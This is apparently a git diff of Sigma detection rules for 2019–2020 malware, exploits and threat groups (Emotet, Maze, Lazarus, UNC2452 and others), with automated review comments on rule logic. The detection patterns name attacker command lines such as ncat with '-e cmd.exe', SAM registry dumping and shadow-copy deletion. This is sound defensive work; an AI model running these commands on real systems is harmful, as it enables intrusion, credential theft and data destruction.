--- a/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml
+++ b/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml
@@ -1,8 +1,8 @@
 title: Operation Wocao Activity
 id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab
 related:
- - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
- type: derived
+ - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
+ type: derived
 status: test
 description: Detects activity mentioned in Operation Wocao report
 references:
@@ -25,14 +25,13 @@ tags:
 logsource:
 category: process_creation
 product: windows
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
 detection:
 process_creation:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - checkadmin.exe 127.0.0.1 -all
 - netsh advfirewall firewall add rule name=powershell dir=in
 - cmd /c powershell.exe -ep bypass -file c:\s.ps1
diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
index 890133987..9654f6a60 100644
--- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
+++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
@@ -1,8 +1,7 @@
 title: Exploited CVE-2020-10189 Zoho ManageEngine
 id: 846b866e-2a57-46ee-8e16-85fa92759be7
 status: test
-description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization
- vulnerability reported as CVE-2020-10189
+description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
 references:
 - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
 - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml
index 517484a68..2446a0a65 100644
--- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml
+++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml
@@ -1,8 +1,7 @@
 title: Suspicious PrinterPorts Creation (CVE-2020-1048)
 id: cc08d590-8b90-413a-aff6-31d1a99678d7
 status: test
-description: Detects new commands that add new printer port which point to suspicious
- file
+description: Detects new commands that add new printer port which point to suspicious file
 references:
 - https://windows-internals.com/printdemon-cve-2020-1048/
 author: EagleEye Team, Florian Roth
@@ -23,14 +22,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection1:
- CommandLine|contains: Add-PrinterPort -Name
+ CommandLine|contains: Add-PrinterPort -Name
 selection2:
- CommandLine|contains:
+ CommandLine|contains:
 - .exe
 - .dll
 - .bat
 selection3:
- CommandLine|contains: Generic / Text Only
+ CommandLine|contains: Generic / Text Only
 condition: process_creation and ((selection1 and selection2) or selection3)
 falsepositives:
 - New printer port install on host
diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml
index 723c043c1..685ab5a23 100644
--- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml
+++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml
@@ -1,8 +1,7 @@ title: DNS RCE CVE-2020-1350 id: b5281f31-f9cc-4d0d-95d0-45b91c45b487 status: test -description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the - detection of suspicious sub process +description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process references: - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml index f35c6c9d9..26ae8b7df 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged status: test description: Attempts to detect system changes made by Blue Mockingbird references: @@ -25,12 +25,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational sc_cmd: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - sc config - wercplsupporte.dll wmic_cmd: Image|endswith: \wmic.exe - CommandLine|endswith: COR_PROFILER + CommandLine|endswith: COR_PROFILER condition: process_creation and (sc_cmd or wmic_cmd) falsepositives: - Unknown 
diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml index 92607dee6..1ea74ba0d 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Emotet Rundll32 Execution id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9 status: test -description: Detecting Emotet DLL loading by looking for rundll32.exe processes with - command lines ending in ,RunDLL or ,Control_RunDLL +description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL references: - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html - https://cyber.wtf/2021/11/15/guess-whos-back/ @@ -22,19 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - ',RunDLL' - ',Control_RunDLL' + # - ',#1' too generic - function load by ordinal is not Emotet specific filter_legitimate_dll: - CommandLine|endswith: + CommandLine|endswith: - .dll,Control_RunDLL - .dll",Control_RunDLL - .dll',Control_RunDLL filter_ide: - ParentImage|endswith: \tracker.exe + ParentImage|endswith: \tracker.exe # When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown 
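Review bot: `filter_ide` excludes every process whose parent image merely ends in `\tracker.exe`, which is a cheap bypass: a loader only has to be started from any binary named tracker.exe to silence this rule, and the new trailing comment documents the Visual Studio/MSBuild case without pinning the filter to it. I would anchor the exclusion to the MSBuild install location, keeping `ParentImage|endswith: \tracker.exe` and adding `ParentImage|contains: \MSBuild\` in the same filter map so both must hold (the exact path is worth confirming on a VS build host). The `# - ',#1' too generic` note is useful; consider adding to it that `filter_legitimate_dll` is what effectively restricts `,Control_RunDLL` hits to non-`.dll` or oddly quoted targets, since that interaction is easy to miss when tuning.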
diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml index 4c67275c9..84fc20a40 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml @@ -1,8 +1,7 @@ title: Potential Ke3chang/TidePool Malware Activity id: 7b544661-69fc-419f-9a59-82ccc328f205 status: test -description: Detects registry modifications potentially related to the Ke3chang/TidePool - malware as seen in campaigns running in 2019 and 2020 +description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 references: - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ @@ -23,7 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. + # Setting these registry keys is unique to the Ke3chang and TidePool malware families. + # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations + # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize + # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden + CommandLine|contains: - -Property DWORD -name DisableFirstRunCustomize -value 2 -Force - -Property String -name Check_Associations -value - -Property DWORD -name IEHarden -value 0 -Force 
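Review bot: The new comment asserts that setting these registry keys "is unique to the Ke3chang and TidePool malware families", which overstates what the selection matches: `Check_Associations` and `DisableFirstRunCustomize` are ordinary Internet Explorer first-run settings, and the rule only matches the specific PowerShell `-Property ... -name ... -value ... -Force` argument strings on a process command line, not the registry write itself (the first hunk's description also says "Detects registry modifications" while the logsource is process_creation). I would soften it to `# Setting this combination of IE settings from a PowerShell command line with -Force is characteristic of Ke3chang/TidePool (see references); the rule matches the command line, not the registry event.` and, if the HKCU paths listed in the comment are what you actually want to catch, pair this with a registry_set rule rather than implying this one covers them.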
diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml index e2c8daf1f..a9eb6a881 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml @@ -1,8 +1,7 @@ title: Potential Maze Ransomware Activity id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052 status: test -description: Detects specific process characteristics of Maze ransomware word document - droppers +description: Detects specific process characteristics of Maze ransomware word document droppers references: - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/ @@ -22,19 +21,22 @@ logsource: category: process_creation product: windows detection: + # Dropper process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: ParentImage|endswith: \WINWORD.exe Image|endswith: .tmp + # Binary Execution selection2: Image|endswith: \wmic.exe ParentImage|contains: \Temp\ - CommandLine|endswith: shadowcopy delete + CommandLine|endswith: shadowcopy delete + # Specific Pattern selection3: - CommandLine|endswith: shadowcopy delete - CommandLine|contains: \..\..\system32 + CommandLine|endswith: shadowcopy delete + CommandLine|contains: \..\..\system32 condition: process_creation and (1 of selection*) fields: - ComputerName diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml b/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml index d6795498a..92067d5fd 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml 
+++ b/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml @@ -1,11 +1,10 @@ title: Trickbot Malware Activity id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 related: - - id: c37510b8-2107-4b78-aa32-72f251e7a844 - type: similar + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar status: stable -description: Detects Trickbot malware process tree pattern in which "rundll32.exe" - is a parent of "wermgr.exe" +description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ diff --git a/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml index 986099578..27a84a251 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml @@ -1,8 +1,7 @@ title: EvilNum APT Golden Chickens Deployment Via OCX Files id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0 status: test -description: Detects Golden Chickens deployment method as used by Evilnum and described - in ESET July 2020 report +description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report references: - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - /s - /i 
diff --git a/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml index c680dcf09..2b8811716 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml @@ -1,8 +1,7 @@ title: GALLIUM IOCs id: 440a56bf-7873-4439-940a-1c8a671073c2 status: test -description: Detects artifacts associated with GALLIUM cyber espionage group as reported - by Microsoft Threat Intelligence Center in the December 2019 report. +description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml 
@@ -65,46 +64,46 @@ detection: - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2 selection_hashes: - - sha256: - - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd - - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b - - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 - - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 - - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 - - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 - - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 - - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 - - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e - - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 - - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 - - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c - - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 - - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 - - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 - - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf - - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 - - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef - - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 - - sha1: - - 53a44c2396d15c3a03723fa5e5db54cafd527635 - - 9c5e496921e3bc882dc40694f1dcc3746a75db19 - - aeb573accfd95758550cf30bf04f389a92922844 - - 79ef78a797403a4ed1a616c68e07fff868a8650a - - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 - - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d - - e841a63e47361a572db9a7334af459ddca11347a - - c28f606df28a9bc8df75a4d5e5837fc5522dd34d - - 2e94b305d6812a9f96e6781c888e48c7fb157b6b - - dd44133716b8a241957b912fa6a02efde3ce3025 - - 8793bf166cb89eb55f0593404e4e933ab605e803 - - 
a39b57032dbb2335499a51e13470a7cd5d86b138 - - 41cc2b15c662bc001c0eb92f6cc222934f0beeea - - d209430d6af54792371174e70e27dd11d3def7a7 - - 1c6452026c56efd2c94cea7e0f671eb55515edb0 - - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a - - 4923d460e22fbbf165bbbaba168e5a46b8157d9f - - f201504bd96e81d0d350c3a8332593ee1c9e09de - - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + - sha256: + - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - sha1: + - 53a44c2396d15c3a03723fa5e5db54cafd527635 + - 9c5e496921e3bc882dc40694f1dcc3746a75db19 + - aeb573accfd95758550cf30bf04f389a92922844 + - 79ef78a797403a4ed1a616c68e07fff868a8650a + - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - 
e841a63e47361a572db9a7334af459ddca11347a + - c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - 2e94b305d6812a9f96e6781c888e48c7fb157b6b + - dd44133716b8a241957b912fa6a02efde3ce3025 + - 8793bf166cb89eb55f0593404e4e933ab605e803 + - a39b57032dbb2335499a51e13470a7cd5d86b138 + - 41cc2b15c662bc001c0eb92f6cc222934f0beeea + - d209430d6af54792371174e70e27dd11d3def7a7 + - 1c6452026c56efd2c94cea7e0f671eb55515edb0 + - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - 4923d460e22fbbf165bbbaba168e5a46b8157d9f + - f201504bd96e81d0d350c3a8332593ee1c9e09de + - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml index 1e80b7c8d..91a1fde4d 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml @@ -1,8 +1,7 @@ title: Greenbug Espionage Group Indicators id: 3711eee4-a808-4849-8a14-faf733da3612 status: test -description: Detects tools and process executions used by Greenbug in their May 2020 - campaign as reported by Symantec +description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia author: Florian Roth (Nextron Systems) 
@@ -33,16 +32,16 @@ detection: - \infopagesbackup\ncat.exe - :\ProgramData\comms\comms.exe selection_msf: - CommandLine|contains|all: + CommandLine|contains|all: - -ExecutionPolicy Bypass -File - \msf.ps1 selection_ncat: - CommandLine|contains|all: + CommandLine|contains|all: - infopagesbackup - \ncat - -e cmd.exe selection_powershell: - CommandLine|contains: + CommandLine|contains: - system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill - -nop -w hidden -c $k=new-object - '[Net.CredentialCache]::DefaultCredentials;IEX ' @@ -50,7 +49,7 @@ detection: - -noninteractive -executionpolicy bypass whoami - -noninteractive -executionpolicy bypass netstat -a selection_other: - CommandLine|contains: L3NlcnZlcj1 + CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server=' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml index e832a4fe6..dbc1b6dd0 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml @@ -1,11 +1,10 @@ title: Lazarus Group Activity id: 24c4d154-05a4-4b99-b57d-9b977472443a related: - - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e - type: obsoletes + - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e + type: obsoletes status: test -description: Detects different process execution behaviors as described in various - threat reports on Lazarus group activity +description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity references: - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - https://www.hvs-consulting.de/lazarus-report/ 
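Review bot: `L3NlcnZlcj1` in `selection_other` is only one encoding of `/server=`: base64 output depends on the 3-byte alignment of the substring, and the trailing `1` additionally assumes the byte after `=` lies in 0x40–0x7F (a letter), so a value such as `/server=10.0.0.5` or `/server="..."` encodes as `L3NlcnZlcj0`, and the two other alignments are `9zZXJ2ZXI9` and `vc2VydmVyP`. As written the rule misses those variants while the new comment reads as if the string covers `/server=` generally. I would make the value a list, `CommandLine|contains: [L3NlcnZlcj0, L3NlcnZlcj1, 9zZXJ2ZXI9, vc2VydmVyP]`, and extend the comment to `# base64 encoded '/server=' in all three alignments; cj0/cj1 differ by the first byte of the value`.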
@@ -26,32 +25,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic: - CommandLine|contains: + CommandLine|contains: - reg.exe save hklm\sam %temp%\~reg_sam.save - 1q2w3e4r@#$@#$@#$ - ' -hp1q2w3e4 ' - '.dat data03 10000 -p ' selection_netstat: - CommandLine|contains|all: + CommandLine|contains|all: - 'netstat -aon | find ' - ESTA - ' > %temp%\~' + # Network share discovery selection_network_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - .255 10 C:\ProgramData\IBM\ - .DAT selection_persistence: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - ' -p 0x' - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32 ' - C:\ProgramData\ - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml index b1625e8dc..4eaaacef7 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml @@ -1,8 +1,7 @@ title: UNC2452 Process Creation Patterns id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f status: test -description: Detects a specific process creation patterns as seen used by UNC2452 - and provided by Microsoft as Microsoft Defender ATP queries +description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Florian Roth (Nextron Systems) 
@@ -12,33 +11,36 @@ tags: - attack.execution - attack.t1059.001 - detection.emerging_threats + # - sunburst + # - unc2452 - sysmon logsource: category: process_creation product: windows detection: + # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic_1: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .txt selection_generic_2: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .log selection_generic_3: ParentCommandLine|contains|all: - wscript.exe - .vbs - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - C:\Windows - .dll,Tk_ @@ -47,11 +49,11 @@ detection: ParentCommandLine|contains: - C:\Windows - .dll - CommandLine|contains: 'cmd.exe /C ' + CommandLine|contains: 'cmd.exe /C ' selection_generic_5: ParentImage|endswith: \rundll32.exe Image|endswith: \dllhost.exe - CommandLine: '' + CommandLine: '' condition: process_creation and (1 of selection_generic_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml index de3cc8524..c0a15fb2a 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml 
@@ -1,8 +1,7 @@ title: UNC2452 PowerShell Pattern id: b7155193-8a81-4d8f-805d-88de864ca50c status: test -description: Detects a specific PowerShell command line pattern used by the UNC2452 - actors as mentioned in Microsoft and Symantec reports +description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ @@ -15,6 +14,7 @@ tags: - attack.t1059.001 - attack.t1047 - detection.emerging_threats + # - sunburst - sysmon logsource: category: process_creation @@ -24,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - Invoke-WMIMethod win32_process -name create -argumentlist - rundll32 c:\windows selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'wmic /node:' - process call create "rundll32 c:\windows condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml index eddbc63c0..a209e36ea 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml +++ 